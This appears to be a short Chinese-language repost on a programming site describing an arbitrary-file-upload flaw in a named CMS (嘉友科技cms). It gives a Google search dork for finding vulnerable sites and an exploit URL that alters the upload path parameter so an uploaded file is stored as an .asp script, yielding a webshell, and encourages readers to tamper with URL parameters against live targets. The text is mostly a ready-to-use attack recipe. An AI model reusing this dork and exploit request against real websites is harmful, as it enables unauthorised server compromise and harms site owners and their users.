好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

修改url的参数进行突破上传限制拿webshell - 网站安

大家可能都看见过这样的漏洞,这里以疯子的 嘉友科技cms 上传 漏洞 为例。

谷歌关键字:inurl:newslist. asp ?NodeCode=

exp: admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath 可以看出对参数PicPath进行了修改, 这种漏洞主要是存在文件名或者路径过滤不严,在实战中多多观察url中的参数,可以尝试进行修改数据。

 

查看更多关于修改url的参数进行突破上传限制拿webshell - 网站安的详细内容...

  阅读:66次